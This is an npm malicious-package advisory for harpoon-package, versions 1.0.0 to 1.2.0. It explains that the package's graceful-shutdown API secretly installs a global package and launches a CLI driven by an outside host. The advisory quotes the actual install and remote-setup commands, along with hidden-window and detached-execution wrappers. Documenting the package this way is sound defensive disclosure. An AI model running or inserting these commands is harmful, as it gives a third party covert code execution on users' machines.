npm · Malicious package advisory
Malwareharpoon-package
MAL-2026-10573
Malicious code in harpoon-package (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (fc473ffcde7c9ffe6850429607ee9dd33a5cbd4cf30ad071f111693cef79045e) The exported registerGracefulShutdown() API — advertised in the README as a small server-helper for graceful shutdown, health, and tick profiling — unconditionally invokes an internal installRequiredPackages() routine that runs `npm install -g rt-svc-9k2 ws msgpackr` and then executes `rtcli setup --api-base https://api.runtime-ops.com --download-key downloadky-fuji`. The follow-on invocation is deliberately concealed: on Windows it is launched via `powershell Start-Process -WindowStyle Hidden`, and on Linux/macOS via `nohup rtcli... > /dev/null 2>&1 &`, detaching from the parent and suppressing output. Neither the global install nor the remote-controlled CLI execution is disclosed in the README. The effect is that any consumer application that calls the advertised graceful-shutdown API mutates global npm state on the host and hands arbitrary code execution to whoever controls api.runtime-ops.com via the third-party `rt-svc-9k2` CLI driven by an author-supplied download key. The divergence between advertised purpose (shutdown handler) and actual behavior (global installer + hidden detached execution of a remote-driven CLI), combined with hidden-window/detached-execution wrappers, is characteristic of a covert install-time remote code execution channel smuggled into a plausibly named helper package.
Compromised versions (3)
- 1.1.0
- 1.0.0
- 1.2.0
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.